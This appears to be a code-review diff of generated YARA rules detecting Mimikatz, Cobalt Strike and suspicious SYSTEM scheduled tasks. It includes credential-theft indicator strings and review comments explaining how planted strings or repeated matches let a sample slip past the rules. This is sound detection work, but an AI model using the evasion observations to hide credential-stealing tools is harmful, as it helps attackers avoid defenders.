((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_80_6 & 1)*65516+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516) >=6
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_80_6 & 1)*-20+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20) >=6
}
rule HackTool_Win32_Mimikatz_A_dha_4{
@ -70,14 +70,14 @@ rule HackTool_Win32_Mimikatz_A_dha_4{
$a_01_6 = {77 00 64 00 69 00 67 00 65 00 73 00 74 00 2e 00 64 00 6c 00 6c 00 } //1 wdigest.dll
$a_01_7 = {6c 00 6f 00 67 00 6f 00 6e 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 73 00 } //1 logonPasswords
$a_01_8 = {63 00 72 00 65 00 64 00 6d 00 61 00 6e 00 } //1 credman
$a_80_9 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
$a_80_10 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
$a_80_11 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
$a_80_12 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
$a_80_13 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
$a_80_14 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
$a_80_15 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
$a_80_9 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
$a_80_10 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
$a_80_11 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
$a_80_12 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
$a_80_13 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
$a_80_14 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
$a_80_15 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
condition:
((#a_01_0 & 1)*2+(#a_01_1 & 1)*2+(#a_01_2 & 1)*2+(#a_00_3 & 1)*2+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516+(#a_80_13 & 1)*65516+(#a_80_14 & 1)*65516+(#a_80_15 & 1)*65516) >=7
((#a_01_0 & 1)*2+(#a_01_1 & 1)*2+(#a_01_2 & 1)*2+(#a_00_3 & 1)*2+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20+(#a_80_13 & 1)*-20+(#a_80_14 & 1)*-20+(#a_80_15 & 1)*-20) >=7
}
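Review bot: The seven -20 exclusion strings (`windows\kevlar-api\kevlarsigs`, the HIPHandlers64/Protector64/ProtectorService64 .pdb paths, `\mcafee\host intrusion prevention\hip` and the two `morphisec_*` names) are repeated verbatim in HackTool_Win32_Mimikatz_A_dha_3, _A_dha_4 and in the Mikatz_dha_, Mimikatz_C__2 and Mimikatz_D_ sections of this commit, and in each of them a single hit pushes the score below the threshold, so the weight is really a hard exclusion rather than a score. If the generator can emit it, a private rule holding those strings with `and not Benign_EDR_Artifacts` appended to each condition would say that directly, keep the list in one place and let YARA skip the weighted arithmetic; if the weighted form must stay for fidelity with the Defender source, a one-line comment on the first exclusion string (`// EDR/HIPS vendor build artifacts: any hit suppresses the rule`) would explain why McAfee and Morphisec paths appear in a Mimikatz signature. The strings `$a_01_0`..`$a_00_3` of _A_dha_4 lie outside this hunk.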


@ -19,14 +19,14 @@ rule HackTool_Win32_Mimikatz_C__2{
$a_02_0 = {6d 69 6d 69 6b 61 74 7a 20 90 02 02 2e 90 02 02 2e 90 02 02 20 28 78 90 01 02 29 20 62 75 69 6c 74 20 6f 6e 90 00 } //10
$a_00_1 = {73 00 65 00 6b 00 75 00 72 00 6c 00 73 00 61 00 3a 00 3a 00 6c 00 6f 00 67 00 6f 00 6e 00 70 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 73 00 } //10 sekurlsa::logonpasswords
$a_00_2 = {64 00 65 00 6c 00 65 00 74 00 69 00 6e 00 67 00 20 00 43 00 3a 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 54 00 65 00 6d 00 70 00 5c 00 64 00 65 00 62 00 75 00 67 00 2e 00 62 00 69 00 6e 00 0a 00 00 00 } //10
$a_80_3 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
$a_80_4 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
$a_80_5 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
$a_80_6 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
$a_80_7 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
$a_80_8 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
$a_80_9 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
$a_80_3 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
$a_80_4 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
$a_80_5 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
$a_80_6 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
$a_80_7 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
$a_80_8 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
$a_80_9 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
condition:
((#a_02_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*10+(#a_80_3 & 1)*65516+(#a_80_4 & 1)*65516+(#a_80_5 & 1)*65516+(#a_80_6 & 1)*65516+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516) >=30
((#a_02_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*10+(#a_80_3 & 1)*-20+(#a_80_4 & 1)*-20+(#a_80_5 & 1)*-20+(#a_80_6 & 1)*-20+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20) >=30
}


@ -11,14 +11,14 @@ rule HackTool_Win32_Mimikatz_D_{
$a_00_4 = {70 6f 77 65 72 73 68 65 6c 6c 5f 72 65 66 6c 65 63 74 69 76 65 5f 6d 69 6d 69 6b 61 74 7a } //1 powershell_reflective_mimikatz
$a_00_5 = {70 6f 77 65 72 6b 61 74 7a 2e 64 6c 6c } //1 powerkatz.dll
$a_00_6 = {5f 4e 65 74 53 65 72 76 65 72 54 72 75 73 74 50 61 73 73 77 6f 72 64 73 47 65 74 } //1 _NetServerTrustPasswordsGet
$a_80_7 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
$a_80_8 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
$a_80_9 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
$a_80_10 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
$a_80_12 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
$a_80_13 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
$a_80_7 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
$a_80_8 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
$a_80_9 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
$a_80_10 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
$a_80_12 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
$a_80_13 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516+(#a_80_13 & 1)*65516) >=5
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20+(#a_80_13 & 1)*-20) >=5
}
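Review bot: The exclusion terms on the new condition line still use `(#a_80_7 & 1)`, which in YARA is the parity of the match count, not presence: a file in which `morphisec_dll_version_s` occurs twice gives `#a_80_11 & 1 == 0`, so the -20 penalty silently vanishes and the rule can fire on exactly the vendor binaries the exclusions are meant to spare. The same applies to the positive terms, but it matters most for exclusions, which are the strings most likely to repeat. `math.min(#a_80_7, 1)` (with `import "math"` at the top of the file) yields presence capped at one; since these rules look generated, the change presumably belongs in the generator rather than in this file.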


@ -9,8 +9,8 @@ rule HackTool_Win32_SystemSchtaskFromPublicUser_A{
$a_00_2 = {2f 00 53 00 43 00 20 00 4f 00 4e 00 4c 00 4f 00 47 00 4f 00 4e 00 } //1 /SC ONLOGON
$a_00_3 = {2f 00 52 00 55 00 20 00 73 00 79 00 73 00 74 00 65 00 6d 00 } //1 /RU system
$a_00_4 = {43 00 3a 00 5c 00 55 00 73 00 65 00 72 00 73 00 5c 00 50 00 75 00 62 00 6c 00 69 00 63 00 5c 00 } //1 C:\Users\Public\
$a_00_5 = {61 00 75 00 74 00 6f 00 6d 00 61 00 74 00 65 00 } //65526 automate
$a_00_5 = {61 00 75 00 74 00 6f 00 6d 00 61 00 74 00 65 00 } //-10 automate
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*65526) >=14
((#a_00_0 & 1)*10+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*-10) >=14
}
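Review bot: The -10 term for `automate` on the new condition line means any schtasks command line that also contains that lowercase UTF-16 substring (for example a task path like `\automate\update`) drops from 14 to 4 and slips past the `>=14` threshold, while the positive strings (`/SC ONLOGON`, `/RU system`, `C:\Users\Public\`) still describe a SYSTEM task launched from a world-writable directory. Unlike the vendor PDB paths used as exclusions elsewhere in this commit, `automate` is a generic word, not a product identifier, so it is trivial to plant. If it was added for one specific benign product, narrow it to that product's path or task name; otherwise consider dropping the term.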


@ -10,11 +10,11 @@ rule HackTool_Win64_CobaltStrike_B{
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
$a_01_4 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
$a_03_5 = {48 ff c0 48 3d 00 10 00 00 7c f1 90 09 04 00 80 90 01 02 90 17 03 01 01 01 2e 69 4e 48 90 00 } //10
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
}


@ -9,11 +9,11 @@ rule HackTool_Win64_CobaltStrike_B_{
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
$a_01_3 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
$a_03_4 = {48 ff c0 48 3d 00 10 00 00 7c f1 90 09 04 00 80 90 01 02 90 03 01 01 2e 69 48 90 00 } //10
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
}


@ -10,11 +10,11 @@ rule HackTool_Win64_CobaltStrike_C{
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
$a_01_4 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
$a_01_5 = {0f af d1 44 8b c8 b8 1f 85 eb 51 f7 e2 41 8b c1 44 8b c2 33 d2 41 c1 e8 05 41 f7 f0 } //10
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
}


@ -9,11 +9,11 @@ rule HackTool_Win64_CobaltStrike_C_{
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
$a_01_3 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
$a_01_4 = {0f af d1 44 8b c8 b8 1f 85 eb 51 f7 e2 41 8b c1 44 8b c2 33 d2 41 c1 e8 05 41 f7 f0 } //10
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
}


@ -10,11 +10,11 @@ rule HackTool_Win64_CobaltStrike_D{
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
$a_01_4 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
$a_03_5 = {b9 00 00 10 00 e8 90 02 3c ba 7f 66 04 40 8b c8 48 8b 90 02 08 89 08 48 8b 4b 20 90 00 } //10
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
}


@ -9,11 +9,11 @@ rule HackTool_Win64_CobaltStrike_D_{
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
$a_01_3 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
$a_03_4 = {b9 00 00 10 00 e8 90 02 3c ba 7f 66 04 40 8b c8 48 8b 90 02 08 89 08 48 8b 4b 20 90 00 } //10
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
}


@ -6,11 +6,11 @@ rule HackTool_Win64_CobaltStrike_E_{
strings :
$a_01_0 = {eb 27 5b 8b 2b 83 c3 04 8b 13 31 ea 83 c3 04 53 8b 33 31 ee 89 33 31 f5 83 c3 04 83 ea 04 31 f6 39 f2 } //1
$a_01_1 = {eb 33 5d 8b 45 00 48 83 c5 04 8b 4d 00 31 c1 48 83 c5 04 55 8b 55 00 31 c2 89 55 00 31 d0 48 83 c5 04 83 e9 04 31 d2 39 d1 } //1
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_3 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_3 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*65436+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436) >=1
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*-100+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100) >=1
}
